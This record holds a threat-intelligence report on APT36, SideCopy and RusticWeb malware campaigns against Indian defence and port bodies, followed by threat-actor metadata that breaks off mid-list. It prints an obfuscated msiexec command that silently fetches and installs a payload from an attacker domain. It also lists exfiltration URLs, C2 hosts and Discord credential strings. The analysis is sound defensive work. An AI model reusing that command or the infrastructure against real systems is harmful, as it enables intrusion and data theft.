{
	"id": "fd41fd2f-93d1-4454-8ab9-d5f2d92e9e92",
	"created_at": "2026-04-06T01:31:59.351554Z",
	"updated_at": "2026-04-10T13:12:51.296683Z",
	"deleted_at": null,
	"sha1_hash": "6ad77b985f6bb09a34b6c121621cbbc727001a2a",
	"title": "Umbrella of Pakistani Threats: Converging Tactics of Cyber-operations Targeting India",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7649423,
	"plain_text": "Umbrella of Pakistani Threats: Converging Tactics of Cyber-operations Targeting India\r\nBy Sathwik Ram Prakki\r\nPublished: 2024-07-25 · Archived: 2026-04-06 01:26:25 UTC\r\nAn open directory hosting malware linked to Transparent Tribe (APT36) has been found by SEQRITE Labs APT\r\nteam. Further analysis revealed hidden URLs on the same domain containing payloads used by its sub-division\r\nAPT group SideCopy. Targeting of Indian government entities such as Air Force, shipyards and ports by SideCopy\r\nis observed via multiple open directories that hosted its newer payloads. A strong correlation between these groups\r\nalong with RusticWeb; including domain/IP, C2 name, decoy files, and more overlaps have been observed. In this\r\nblog, we will explore these payloads and the overlaps seen during the recent increase in such campaigns.\r\nKey Findings\r\nAPT Overlaps\r\nA domain is found to be hosting payloads of both SideCopy and APT36 together, targeting Windows and\r\nLinux environments respectively.\r\nThe C2 server used by SideCopy’s RAT payloads has the same Common Name (WIN-P9NRMH5G6M8)\r\ntypically associated with that of APT36.\r\nBoth threat groups along with RusticWeb, use the same lure file in various formats, infrastructure and web-services in their infection chains making their connections stronger.\r\nSideCopy Infections\r\nUsing updated HTA same as SideWinder to evade detections, making it fully undetectable (FUD). Encoded\r\nURLs that hosted RTF files of SideWinder APT group were found in SideCopy’s stager.\r\nReverse RAT is delivered via MSI packages using an ‘Indian Air Force’ theme as a decoy, and in-memory\r\nvariants of Reverse RAT were also seen. 
More open directories were found on another two domains hosting DOTM files to deliver Reverse RAT via BAT files, targeting shipyards \u0026 ports.\r\nNew payloads were also seen: Cheex, used to steal documents and images; a USB copier to steal files from attached drives; the FileZilla application; and SigThief scripts.\r\nTesting of stager evasion against anti-virus at Pakistan locations has been identified. At the same time, victim traffic from India that is typically observed from a C2 located in Germany is being routed through the IPsec protocol from Pakistan IPs, as shared by The Brofessor from Team Cymru.\r\nA new .NET-based payload named Geta RAT, executed in memory by the HTA, incorporates browser-stealing functionality from Async RAT. In parallel, Action RAT is side-loaded by charmap.exe instead of credwiz.exe/rekeywiz.exe, and the use of a honey trap theme named ‘WhatsApp Image’ is seen.\r\nTransparent Tribe Infections\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 1 of 36\n\nA Golang-based downloader targeting Linux systems is used to fetch the final payload from Google Drive. This final payload was recently seen to be fetched from a domain instead and has been named DISGOMOJI by Volexity, where “weak infrastructure links to SideCopy” were mentioned.\r\nThe group continues to target the Linux platform with Poseidon using desktop shortcuts having lure themes such as ‘Posting/Transfer under Ph-III of Rotational Transfer’, ‘Blacklist IP Address with TLP \u0026 Dates’ and ‘LTC checklist’.\r\nThe use of Crimson RAT, with ‘Uttarakhand Election Result’ and ‘TDS Claim Summary’ baits along with embedding of the FileZilla application, has also been observed.\r\nFig. 1 – Overlapping Infection Chain\r\nOverlapping Attack\r\nThe domain found with the open directory is campusportals[.]in with multiple folders hosted on it. 
These contain Golang-based Linux payloads attributed to APT36, but at the same time, multiple hidden URLs were observed hosting HTA stagers that belong to the SideCopy APT. The domain originally served as a guide to various Indian entrance exams; the last post on its Twitter/YouTube was made in 2016. A similar open directory was observed earlier hosting SideCopy stagers on the same web server software, LiteSpeed Web Server. The domain in that case, reviewassignment[.]in, was used for another education portal, one offering early childhood education and care services.\r\nFig. 2 – Open Directory hosting APT36 and hidden URLs with SideCopy stagers\r\nA ZIP archive is present in one of the directories; it contains a password-protected PDF and a UPX-packed ELF binary. Unpacking this shows a Golang binary that acts as a downloader, where it first opens the decoy PDF using the passcode ‘745414’. The lure theme is a survey on internet usage, which was observed in multiple previous campaigns of SideCopy since February 2023.\r\nFig. 3 – Internet survey lure\r\nThen it downloads the next-stage payload from Google Drive as gnucoreinfo to the hidden directory .x86_32-linux-gnu, makes it executable, and starts it in the background. Persistence is set up via two AutoStart desktop entries named GNOME_Core.desktop and GNULib_Update.desktop. A bash script is dropped and registered as a cron job to download the payload and make sure that a duplicate process is not running, as shown below.\r\nFig. 4 – Process of Golang downloader in persistence script\r\nVariant of DISGOMOJI\r\nThe final payload is another UPX-packed Golang-based ELF binary named ‘vmcoreinfo.txt’. 
This is a remote access trojan based on the open-source repository discord-c2, which uses a Discord server as a C2 and emojis for communication. Volexity has observed different variants of DISGOMOJI, where the server ID and bot token of the Discord server are either hardcoded or downloaded at runtime as BID1.txt and GID1.txt from ordai[.]quest. In this version, Google Drive is used to download them with the following names, which suggest that this is a second server:\r\nFilename – Details – Google Drive Download Link\r\nBID2.txt – MTI0NjkwMDE2NTI1MjQ4NTM1Mg.GWqtv3.cZmv1ZIts2ClyZ6jcKKpRzkD_hChmEkfDcZKeM (Server ID) – hxxps://drive.google.com/uc?export=download\u0026id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe\r\nGID2.txt – 1246900038160879688 (Bot Token) – hxxps://drive.google.com/uc?export=download\u0026id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t\r\nGTK-Theme-Parse.txt – 2bf596603c432fa46b494dc3edd2d30f (MD5) – hxxps://drive.google.com/uc?export=download\u0026id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_\r\nAll the error-handling messages present are meant to mislead about the actual functionality, but one interesting error name is observed to be “Error updating Kavach Repository: %v”. An obfuscated file named GTK-Theme-Parse.txt is downloaded, which serves to periodically copy files from connected USB drives to a local directory. A cron job is set up similarly for persistence, and these files could be exfiltrated using the emoji-based RAT.\r\nFig. 5 – Obfuscated USB stealer script\r\nDISGOMOJI gathers basic system details initially, and its functionality includes taking screenshots, executing commands, uploading files to web services (oshi[.]at and transfer[.]sh), downloading and uploading files via the Discord server, collecting Firefox browser profiles, and finding files by extension to exfiltrate. 
The last one has a unique string in Punjabi (the most widely spoken language in Pakistan) that translates to “I have given you all the knowledge, what else do you want?”, apt for data exfiltration. New Windows and Linux variants of PYSHELLFOX and GLOBESHELL for exfiltrating files and stealing Firefox profiles were also mentioned by BlackBerry.\r\nFig. 6 – Exfiltration message\r\nVariant of Poseidon\r\nWe have also observed continuous deployment of Poseidon agents via Linux desktop shortcuts by Transparent Tribe, where the bait files were similarly hosted on Google Drive, with fikumatry\u003cat\u003egmail.com and fitfalcon0900\u003cat\u003egmail.com as the owners of the accounts. The three different decoys observed are all related to various Indian government documents. These are the posting/transfer of officers under the Ministry of Defence from the previous year, blacklisted IP addresses with TLP \u0026 dates, and a checklist for LTC claims.\r\nFig. 7 – IP blacklist decoy with Poseidon (1)\r\nFig. 8 – Checklist decoy with Poseidon (2)\r\nFig. 9 – Posting/Transfer decoy with Poseidon (3)\r\nSideCopy\r\nBased on the URLs seen in a recent SideCopy infection, similar hosting of HTA stagers was identified along with the same baits. The infection starts with an archived shortcut file that launches the MSHTA process to execute remote HTA files hosted on this same domain. In total, six HTA files were found, named either 1.hta or 2.hta. The first HTA variant has two base64 decode functions, one based on JavaScript and the other using ActiveX objects. 
The functionality for this remains the same: a .NET version check, checking the AV solution installed, concatenating the payload and decoding strings, and finally executing the DLL in memory while passing it the decoy file.\r\nFig. 10 – HTA stager 2nd variant\r\nThe second HTA variant is heavily obfuscated and has been observed only occasionally since last year; it uses multiple techniques:\r\nDecode a base64-like encoded string using a custom alphabet\r\nXOR-based decryption (with keys: f551e832 and bWqQ)\r\nString reversal for every 1/2/5 characters\r\nCaesar cipher shift using multiple keys\r\nFig. 11 – Deobfuscation in HTA\r\nThe overall functionality remains the same, but these obfuscation patterns have been seen in HTA files of the SideWinder APT since last year. Strings that are not used anywhere in the script contain URLs (cabinet-gov-pk[.]ministry-pk[.]net) that hosted RTF files of SideWinder a few years back.\r\nFig. 12 – SideCopy stager with SideWinder URLs (comments from analysis)\r\nThe in-memory preBotHta DLL performs the usual sequence of opening the decoy and getting the AV solution installed. Based on the AV solution, it sets persistence as a combination of a scheduled task (VBScript), run registry key or startup shortcut. Ultimately it either drops two additional HTA files or downloads MSFTEDIT.dll (Action RAT) from ‘hxxps://campusportals.in//files//documents//backup//ap.txt’, which is side-loaded by charmap.exe and connects to 64.188.27[.]144 on port 5863 for C2.\r\nFig. 
13 – SideWinder domain hosting RTF files\r\nThe HTA files dropped are named useH, useT and alphaT; they have the same HTA functionality mentioned above and execute a DLL in memory at the end. Two different DLLs are found. One is Reverse RAT, which includes 19 commands for C2 along with a USB file grabber that saves files and folders whenever a new drive is attached. The second one is a new .NET-based Geta RAT with 30 commands for C2, which can also steal both Firefox and Chromium-based browser data of all accounts, profiles and cookies. This browser plugin is borrowed from Async RAT, as shown below.\r\nFig. 14 – Geta RAT vs. Async RAT\r\nNo Command Functionality\r\n1 Disconnected Close the connection\r\n2 SystemInformation Get system data (computer name, username, screen size, available \u0026 total memory (physical and virtual), OS details, battery power status, system up time, drivers, network details)\r\n3 pkill Kill specific process and fetch process list\r\n4 ProcessManager Get process list\r\n5 Software Get installed software\r\n6 Passwords Get Firefox and Chromium-based browser credentials from all accounts/profiles/cookies\r\n7 RD Get screenshot of remote desktop\r\n8 GetPcBounds Get screen size\r\n9 SetCurPos Set cursor position\r\n10 GetHostsFile Get \\etc\\hosts file\r\n11 SaveHostsFile Save \\etc\\hosts file at specified location\r\n12 GetCPText Get clipboard contents\r\n13 SaveCPText Save clipboard contents at specified location\r\n14 Shell Run command via “cmd /C”\r\n15 RecordingStart No functionality defined but most likely used for screen capture\r\n16 RecordingStop No functionality defined but most likely used for screen capture\r\n17 RecordingDownload No functionality defined but most likely used for screen capture\r\n18 ListDrives Get drives list\r\n19 ListFiles Get files and directories for specified path\r\n20 mkdir Create a new directory\r\n21 rmdir Delete a directory\r\n22 rnfolder Rename a directory\r\n23 mvdir Move a directory\r\n24 rmfile Delete a file\r\n25 rnfile Rename a file\r\n26 sharefile Download a file\r\n27 run Execute a file\r\n28 Execute 1. Upload a file and execute it via DLL side-loading; 2. Execute “cmd /C netstat -ano” and get connection status of server IP; 3. Get installed AV\r\n29 addSys Set persistence via registry or startup\r\n30 fileupload Upload a file\r\nTwo similar iterations of HTA resembling CACTUS TORCH and SILENT TRINITY were observed but have evaded detections completely. These are executed via shortcut files and utilize themes such as a honey trap and the US China standoff to eventually drop the final payload.\r\nFig. 15 – New HTA stager\r\nThe differences noted in this new HTA, though the functionality remains the same:\r\nApart from base64 decoding, another function that decodes data of a specified length is used. Primarily, the embedded DLL is encoded twice using these functions.\r\nThe decoy and side-loaded DLL are not embedded separately in the HTA but in the .NET DLL itself.\r\nIt does not use WMI queries to get the AV installed, nor VBScript to get the .NET version.\r\nImportantly, no target is specified when creating an instance and invoking it dynamically.\r\nFig. 16 – Simplified HTA version\r\nInstead of loading preBotHta or SummitOfBion in memory, BroaderAspect.dll is seen, which drops the decoy and opens it. 
No anti-virus check is done, but a registry run key is set for persistence and the DLL (DUser.dll) is dropped to be side-loaded via rekeywiz. The target path is ‘C:\\Users\\Public\\BroadCastUSB\\crezly.exe’ and the PDB path associated with two files is ‘E:\\TestAssembly\\obj\\Debug\\BroaderAspect.pdb’.\r\nFig. 17 – DLL run in-memory of MSHTA\r\nReverse RAT campaigns\r\nMultiple infections leading to Reverse RAT have been observed that used lures and fake domains related to various shipbuilding docks, ports and even the Air Force. All these entities are administered under the Indian Government’s Ministry of Defence (MoD) and Ministry of Ports, Shipping and Waterways (MOPSW).\r\nFig. 18 – Reverse RAT infection and targets\r\nA standalone variant of Reverse RAT is dropped via an MSI package in the same timeframe. A ZIP file named ‘Salary_Increment_FY_2024’ contains an LNK shortcut that downloads and executes an MSI package with the following command:\r\nC:\\Windows\\System32\\cmd.exe /c m^s^i^e^x^e^c.exe /q /i hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/\r\nThe package comprises a Confuser-protected .NET PE file that is executed during the custom action \u0026 installation sequences, as shown in the image below. 
Reverse RAT is dropped as “C:\\ProgramData\\VSUpdates\\svirbre.exe” at the end, with the same 19 commands for C2; persistence for it is set via another HTA script, fileros.hta, using the run registry key.\r\nNo Command Functionality\r\n1 run Execute a file\r\n2 list List files or directories of a path\r\n3 pkill Kill a running process\r\n4 close Close the connection with the C2\r\n5 rename Rename a file\r\n6 screen Take a screenshot\r\n7 upload Upload a file to C2\r\n8 delete Delete a file\r\n9 reglist List all registry keys and their values\r\n10 process List all running processes\r\n11 programs List all installed programs\r\n12 download Download a file from C2\r\n13 creatdir Create a new directory\r\n14 shellexec Execute a command or open a file using cmd.exe\r\n15 regnewkey Create a new registry key\r\n16 clipboard Retrieve the clipboard content\r\n17 regdelkey Delete a registry key\r\n18 downloadexe Download and execute a file\r\n19 clipboardset Set the clipboard content\r\nFig. 19 – MSI package to drop Reverse RAT\r\nThe infection chain with payloads is as follows:\r\nFilename Details\r\nSalary_Increment_FY_2024.zip Modify Date: 2024-06-03\r\nSalary_Increment_FY_2024.pdf.lnk Machine ID: cop125n, Modify Date: 2023-12-04\r\nnewpictures.png (MSI) Modify Date: 2020-09-18, Author: MSTech Soft\r\nFilmeos.exe .NET Confuser 1.x\r\nsvirbre.exe (Reverse RAT) Key: winupdates@7, C2: defender.windowupdatecache[.]in/officalupdates\r\nThe decoy dropped contains salary increment details given to the employees of the Indian Air Force. 
It is a recent document mentioning the effective payout date as July 2024.\r\nFig. 20 – Indian Air Force pay decoy\r\nMore open directories\r\nIn July, two more domains with open directories were seen that hosted both new and old SideCopy payloads, as seen from the timestamps. These contain multiple EXE, PNG, PDF, BAT and other documents used in Reverse RAT campaigns. The domain slidesfinder[.]com hosted July samples that fetch payloads from another domain, mazagondoc[.]com, which in turn hosted files in October 2023 for template injection attacks.\r\nFig. 21 – Open directories hosting SideCopy payloads\r\nTwo macro-enabled template documents named Aerospace.dotm and tmps.dotm were observed that begin the infection chain. Obfuscated subroutines are executed upon opening the document; they download the hosted PNG file as a batch script “08973422348.bat” into the TEMP directory if the HTTP response is 200. If the file exists, the batch file is run using the Shell function.\r\nFig. 22 – VBA macro in template documents\r\nIn one of the templates, the macro later calls the UNLK subroutine, which changes the attached template of the active document to the Normal.dotm template in the user’s directory and then closes the document without saving changes. If an error occurs, it calls the DVBP subroutine, which attempts to remove all VBA components from the document, thereby deleting all VBA code. 
The batch script shown below essentially downloads the Reverse RAT payload as a PNG using PowerShell, copies it to a hidden directory and creates a scheduled task to run it every 5 minutes.\r\nFig. 23 – Batch script to download Reverse RAT\r\nThe decoy file Letter002.pdf is also downloaded and opened simultaneously; it contains contract details of Cochin Shipyard Limited for January 2024, which operates under the Ministry of Ports, Shipping and Waterways. All these monthly contract details are publicly available on the shipyard’s legitimate domain. Apart from listening for the 19 commands, Reverse RAT downloads another file from the mazagondoc[.]com domain, which mimics the official website of the Ministry of Defence’s Mazagon Dock Shipbuilders Limited, mazagondock[.]in. This payload-hosting domain was also observed in an October 2023 campaign delivering Reverse RAT with similar targeting. The C2 seen with Reverse RAT is vocport[.]com/Contactus, which mimics the domain of the V. O. Chidambaranar Port Authority under the Ministry of Ports, Shipping and Waterways.\r\nFig. 24 – Decoy with contract details of Cochin Shipyard\r\nMore and more of .NET\r\nA new .NET-based payload is downloaded and run which has the functionality to search \u0026 save files with specific extensions. These are later exfiltrated to the following servers, as seen with two samples:\r\nhxxp://149.28.95.195/dakshf_upload.php\r\nhxxps://googleservices[.]live/dakshf_upload.php\r\nThese samples also contain the PDB path of the source project under the username “Dead Snake”, with the project name cheex (an unrelated online platform with this name exists). 
It checks five folders – Desktop, Personal, Common Documents, Downloads and Recent – for files with these 12 extensions: DOCX, DOC, XLSX, XLS, PPTX, PPT, PDF, BAK, JPEG, JPG, PNG and TXT.\r\nC:\\Users\\Dead Snake\\source\\repos\\cheex-folderwise\\cheex\\obj\\Release\\dlhost.pdb\r\nC:\\Users\\Dead Snake\\source\\repos\\cheex\\cheex\\obj\\Debug\\cheex.pdb\r\nFig. 25 – New payloads for file exfiltration\r\nThe Reverse RAT delivered via MSI above included functionality for file exfiltration from attached USB devices; that is now present as a separate module altogether. All drive letters are enumerated, and files are copied to the TEMP directory using background workers before uploading them to the same IP. The PDB paths observed for two samples are:\r\ne:\\DBD\\MA\\Miscelleneous\\Usb-Copier\\Usb-Copier\\FileCorrupter\\obj\\x86\\Release\\AdobeReaders.pdb\r\ne:\\DBD\\MA\\Miscelleneous\\Usb-Copier\\Usb-Copier\\FileCorrupter\\obj\\x86\\Debug\\AdobeReaders.pdb\r\nOther files observed, related to previous campaigns, are macro-enabled documents, decoys, the FileZilla application (used for file transfer) and SigThief, an open-source Python script used to steal and append signatures:\r\nNaval_Projects_Payment_section_Report_29092023.docx\r\nNaval_Projects_Payment_section_Report_131023.docx\r\nProject_and_Services_Section_report_10102023.docx\r\nLetter002.pdf\r\nNavalProjects.pdf\r\nOther decoy documents that were used in 2023 campaigns were also found on the same domain. These are related to a port entry permit for the government’s V. O. Chidambaranar Port Authority and the invoice status of vendors related to Naval Projects. These lures are publicly available documents.\r\nFig. 
26 – Naval port themed decoy from Oct 2023 campaign\r\nFig. 27 – Naval project invoice themed decoy from Oct 2023 campaign\r\nInfrastructure and Attribution\r\nBased on our analysis so far, we have observed overlaps between three Pakistan-linked APT groups. Transparent Tribe is known to utilize a diverse set of techniques and languages such as Golang and Python, and Operation RusticWeb has utilized Rust-based payloads. Both use the oshi[.]at web service and the same two PDF bait documents, and their fake domains resolved to the same IP address, as observed by BlackBerry and Volexity.\r\nFig. 28 – Pakistani APT overlaps\r\nSimilarly, overlaps between SideCopy and APT36 have been observed, such as lures, a Linux stager to drop Ares RAT and Poseidon respectively, payloads based on AllaKore RAT and the common name of the C2 servers. 
We assess with medium to high confidence that RusticWeb is directly linked to APT36, similar to SideCopy acting as a sub-team of APT36.\r\nThe fake/compromised domains used to host payloads resolve to the following IP addresses, two of which are seen with the common name WIN-BEJO0EMFO5K.\r\nDomain IP ASN\r\ncampusportals[.]in 192.64.117[.]203 AS22612 – Namecheap\r\nmazagondoc[.]com 172.67.217[.]17 (CN=WIN-BEJO0EMFO5K) AS13335 – Cloudflare\r\nslidesfinder[.]com 103.133.215[.]65 (CN=WIN-BEJO0EMFO5K) AS133643 – Ewebguru, India\r\ndipl[.]site 151.106.117[.]91 AS47583 – Hostinger\r\nutkalsevasamitikanjurmarg[.]in 162.0.209[.]114 AS22612 – NameCheap\r\nLooking at the C2 servers, the IP 64.188.27[.]144 was used with Action RAT and Geta RAT on the same ports, and even the Reverse RAT C2 checkdailytips.servehttp[.]com resolved to that IP. The common name associated with it, WIN-P9NRMH5G6M8, is found on most C2 servers of APT36.\r\nFig. 29 – IP with Common Name of APT36\r\nThe domain vocport[.]com is used now as well as in past campaigns from October 2023. 
Whois details of all C2 servers with their observed payloads are as follows:\r\nDomain / IP ASN Payload\r\nvocport[.]com (104.21.40[.]190, 172.67.156[.]79) AS13335 – Cloudflare Reverse RAT\r\ndefender.windowupdatecache[.]in (172.67.128[.]127) AS13335 – Cloudflare Reverse RAT\r\ncheckdailytips.servehttp[.]com, dns1.indianblog[.]xyz (64.188.27[.]144, CN=WIN-P9NRMH5G6M8) AS8100 – QuadraNet Reverse RAT, Action RAT, Geta RAT\r\ngoogleservices[.]live, 149.28.95[.]195 AS13335 – Cloudflare, AS20473 – Choopa Cheex, USB-Copier\r\n84.247.170[.]237 AS51167 – Contabo New RAT\r\n165.22.221[.]71, 178.128.166[.]148, 152.42.162[.]105, 161.35.207[.]209, 159.65.146[.]80, 157.245.100[.]177 AS14061 – DigitalOcean Poseidon\r\nBased on this correlation and previous attack chains, these campaigns are attributed to both the APT36 and SideCopy groups with high confidence, establishing yet another strong connection between them.\r\nConclusion\r\nMultiple open directories hosting stagers/payloads linked to Pakistan APT groups have been discovered that targeted the Indian Air Force, ports \u0026 shipyards under government entities. Various cyber operations have been observed where overlap between Transparent Tribe, SideCopy and RusticWeb is found.\r\nAPT36’s focus is mainly Linux systems, whereas SideCopy targets Windows systems, adding new payloads to its arsenal. In the second quarter of 2024, multiple Pakistan-linked threat groups targeting India that use Android-based malware have been reported. These include Operation Celestial Force, tracked as Cosmic Leopard, and another new group leveraging WhatsApp to deliver SpyNote RAT. 
It is suggested to take necessary precautions and stay\r\nprotected amidst the continuous cyber-attacks on India.\r\nSEQRITE Protection\r\nLnk.Sidecopy.48846.Gen_GC\r\nMSI.Sidecopy.48847.GC\r\nJS.Sidecopy.48848.Gen_GC\r\nDocx.APT36.48849.GC\r\nELF.Agent.48863.GC\r\nELF.Agent.48860.GC\r\nO97M.Dropper.DZ\r\nBAT.Downloader.48924\r\nXML.SideCopy.48922\r\nXML.SideCopy.48923\r\nTrojanAPT.ReverseRAT.S33893087\r\nIOCs\r\nhttps://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/\r\nPage 28 of 36\n\nMITRE ATT&CK\r\nTactic | Technique ID | Name\r\nResource Development | T1583.001 | Acquire Infrastructure: Domains\r\nResource Development | T1584.001 | Compromise Infrastructure: Domains\r\nResource Development | T1587.001 | Develop Capabilities: Malware\r\nResource Development | T1588.001 | Obtain Capabilities: Malware\r\nResource Development | T1588.002 | Obtain Capabilities: Tool\r\nResource Development | T1608.001 | Stage Capabilities: Upload Malware\r\nResource Development | T1608.005 | Stage Capabilities: Link Target\r\nInitial Access | T1566.001 | Phishing: Spearphishing Attachment\r\nInitial Access | T1566.002 | Phishing: Spearphishing Link\r\nExecution | T1106 | Native API\r\nExecution | T1129 | Shared Modules\r\nExecution | T1059 | Command and Scripting Interpreter\r\nExecution | T1047 | Windows Management Instrumentation\r\nExecution | T1204.001 | User Execution: Malicious Link\r\nExecution | T1204.002 | User Execution: Malicious File\r\nPersistence | T1053.003 | Scheduled Task/Job: Cron\r\nPersistence | T1547.001 | Registry Run Keys / Startup Folder\r\nPersistence | T1547.013 | Boot or Logon Autostart Execution: XDG Autostart Entries\r\nDefense Evasion | T1027.010 | Command Obfuscation\r\nDefense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location\r\nDefense Evasion | T1036.007 | Masquerading: Double File Extension\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information\r\nDefense Evasion | T1218.005 | System Binary Proxy Execution: Mshta\r\nDefense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading\r\nDefense Evasion | T1027.009 | Obfuscated Files or Information: Embedded Payloads\r\nDefense Evasion | T1027.010 | Obfuscated Files or Information: Command Obfuscation\r\nDiscovery | T1012 | Query Registry\r\nDiscovery | T1016 | System Network Configuration Discovery\r\nDiscovery | T1033 | System Owner/User Discovery\r\nDiscovery | T1057 | Process Discovery\r\nDiscovery | T1082 | System Information Discovery\r\nDiscovery | T1083 | File and Directory Discovery\r\nDiscovery | T1518.001 | Software Discovery: Security Software Discovery\r\nCollection | T1005 | Data from Local System\r\nCollection | T1056.001 | Input Capture: Keylogging\r\nCollection | T1074.001 | Data Staged: Local Data Staging\r\nCollection | T1119 | Automated Collection\r\nCollection | T1113 | Screen Capture\r\nCollection | T1125 | Video Capture\r\nCommand and Control | T1105 | Ingress Tool Transfer\r\nCommand and Control | T1571 | Non-Standard Port\r\nCommand and Control | T1573 | Encrypted Channel\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols\r\nExfiltration | T1020 | Automated Exfiltration\r\nExfiltration | T1041 | Exfiltration Over C2 Channel\r\nExfiltration | T1567 | Exfiltration Over Web Service\r\nAuthor: Sathwik Ram Prakki\r\nSource: https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/"
	],
	"report_names": [
		"umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc",
			"created_at": "2022-10-27T08:27:12.955905Z",
			"updated_at": "2026-04-10T02:00:05.376527Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"SideCopy"
			],
			"source_name": "MITRE:SideCopy",
			"tools": [
				"AuTo Stealer",
				"Action RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "403c7091-ccdd-4a76-94ad-27eb61449336",
			"created_at": "2024-01-18T02:02:34.407633Z",
			"updated_at": "2026-04-10T02:00:04.829369Z",
			"deleted_at": null,
			"main_name": "Operation RusticWeb",
			"aliases": [],
			"source_name": "ETDA:Operation RusticWeb",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "fce5181c-7aab-400f-bd03-9db9e791da04",
			"created_at": "2022-10-25T15:50:23.759799Z",
			"updated_at": "2026-04-10T02:00:05.3002Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"Transparent Tribe",
				"COPPER FIELDSTONE",
				"APT36",
				"Mythic Leopard",
				"ProjectM"
			],
			"source_name": "MITRE:Transparent Tribe",
			"tools": [
				"DarkComet",
				"ObliqueRAT",
				"njRAT",
				"Peppy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7fc3c743-5f3d-4c30-a388-5937abef3659",
			"created_at": "2024-06-20T02:02:09.693669Z",
			"updated_at": "2026-04-10T02:00:04.630596Z",
			"deleted_at": null,
			"main_name": "Cosmic Leopard",
			"aliases": [
				"Cosmic Leopard",
				"Operation Celestial Force"
			],
			"source_name": "ETDA:Cosmic Leopard",
			"tools": [
				"GravityAdmin",
				"GravityRAT",
				"HeavyLift"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e",
			"created_at": "2023-01-06T13:46:39.080551Z",
			"updated_at": "2026-04-10T02:00:03.206572Z",
			"deleted_at": null,
			"main_name": "RAZOR TIGER",
			"aliases": [
				"APT-C-17",
				"T-APT-04",
				"SideWinder"
			],
			"source_name": "MISPGALAXY:RAZOR TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00",
			"created_at": "2023-01-06T13:46:39.30167Z",
			"updated_at": "2026-04-10T02:00:03.280161Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [],
			"source_name": "MISPGALAXY:SideCopy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
